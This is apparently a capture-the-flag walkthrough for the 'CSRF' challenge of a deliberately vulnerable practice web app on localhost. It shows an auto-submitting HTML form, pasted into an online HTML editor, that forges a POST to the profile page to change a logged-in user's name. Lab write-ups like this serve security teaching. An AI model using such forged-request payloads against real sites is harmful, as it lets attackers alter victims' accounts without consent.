CSRF

Difficulty: 🌟🌟🌟

Description: Change the name of a user by performing Cross-Site Request Forgery from another origin.

Category: Broken Access Control

Tags:

Solution:

Tested on:

Windows 11
Firefox: 60.0.2/win64/en-US

NOTE: New Firefox version can't perform this attack❗.

NOTE: Firefox version 60.0.2 won't display modal or navigate bar normally, so I suggest you navigate between pages using URL.

First, log in to the user account and navigate to route localhost:3000/profile:

Then open http://htmledit.squarefree.com/ as a new tab:

NOTE: Open with http as intended.

live HTML editor

Then paste the code below to the HTML live editor:

<form action="http://localhost:3000/profile" method="POST">
  <input name="username" value="DuckyMomo20012"/>
  <input type="submit"/>
</form>
<script>document.forms[0].submit();</script>

The attack will be performed immediately:

CSRF attack

Then reload the profile page to see changes:

result